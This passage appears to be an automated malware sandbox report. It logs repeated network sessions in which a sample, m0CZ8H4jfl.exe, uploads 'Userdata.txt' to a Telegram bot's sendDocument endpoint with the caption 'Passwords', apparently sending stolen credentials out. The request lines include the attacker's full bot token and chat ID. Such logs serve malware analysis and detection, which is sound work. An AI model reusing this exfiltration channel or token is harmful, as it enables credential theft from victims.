                                                                                                        2025-01-10 18:57:21 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 34 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44632,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535441,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        32192.168.2.950036149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:57:23 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd33d7e388cba5
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-10 18:57:23 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 64 37 65 33 38 38 63 62 61 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd33d7e388cba5Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:57:23 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:57:23 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:57:23 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 34 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44633,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535443,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        33192.168.2.950038149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:57:24 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd33f3f04ae1a8
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-10 18:57:24 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 66 33 66 30 34 61 65 31 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd33f3f04ae1a8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:57:25 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:57:25 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:57:25 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 34 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44634,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535445,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        34192.168.2.950040149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:57:26 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd3418cac0da0c
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-10 18:57:26 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 31 38 63 61 63 30 64 61 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd3418cac0da0cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:57:26 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:57:26 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:57:26 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 33 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 34 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44635,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535446,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        35192.168.2.950042149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:57:29 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd344def382758
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-10 18:57:29 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 34 64 65 66 33 38 32 37 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd344def382758Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:57:29 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:57:29 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:57:29 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 34 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44636,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535449,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        36192.168.2.950044149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:57:31 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd347dd0bc2292
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-10 18:57:31 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 37 64 64 30 62 63 32 32 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd347dd0bc2292Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:57:31 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:57:31 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:57:31 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 35 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44637,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535451,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        37192.168.2.950046149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:57:33 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd349e790014a9
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-10 18:57:33 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 39 65 37 39 30 30 31 34 61 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd349e790014a9Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:57:33 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:57:33 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:57:33 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 35 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44638,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535453,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        38192.168.2.950048149.154.167.220443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:57:39 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd317ebe20a167
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-10 18:57:39 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 37 65 62 65 32 30 61 31 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd317ebe20a167Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:57:39 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:57:39 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
